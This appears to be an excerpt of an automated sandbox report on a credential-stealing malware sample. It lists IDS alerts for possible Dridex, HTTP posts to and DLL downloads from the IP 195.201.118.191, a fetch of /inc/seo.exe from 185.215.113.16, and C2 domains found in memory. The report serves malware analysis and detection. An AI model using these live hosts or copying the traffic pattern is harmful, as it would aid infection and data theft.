Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49918 -> 195.201.118.191:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49896 -> 195.201.118.191:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49952 -> 195.201.118.191:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49925 -> 195.201.118.191:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49939 -> 195.201.118.191:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49929 -> 195.201.118.191:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49946 -> 195.201.118.191:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49954 -> 195.201.118.191:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49842 -> 195.201.118.191:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49932 -> 195.201.118.191:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 6841Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlr.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 32481Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 4421Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 4421Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 4421Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 3269Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 11445Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 14153Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 14133Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 14129Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 14173Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 1977Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 3161Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 1697Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIIEHJKKECGCBFIIJDAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 1929Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 465Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_002729BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

18_2_002729BA

Source: global traffic	HTTP traffic detected: GET /profiles/76561199751190313 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlr.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/seo.exe HTTP/1.1Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: VBSJYFEwZnGfeqPJmZz.VBSJYFEwZnGfeqPJmZz
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: arpdabl.zapto.org

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 195.201.118.191Content-Length: 278Connection: Keep-AliveCache-Control: no-cache

Source: axplong.exe, 00000007.00000003.2914837970.0000000000D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
Source: Predicted.pif, 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.0000000001878000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.DAAAKFHJKJ
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.HJKJ
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org
Source: Predicted.pif, 00000012.00000002.4066261893.000000000178A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/
Source: Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/-S
Source: Predicted.pif, 00000012.00000002.4066261893.000000000178A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/1
Source: Predicted.pif, 00000012.00000002.4066261893.000000000178A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/1Gp
Source: Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.org/5S
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zapto.orgJ
Source: Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://arpdabl.zaptoFHJKJ
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: seo[1].exe.7.dr, seo.exe.7.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Predicted.pif.9.dr, Determined.8.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Predicted.pif, 00000012.00000002.4073113420.000000000C895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr, mozglue.dll.18.dr, nss3.dll.18.dr, freebl3.dll.18.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
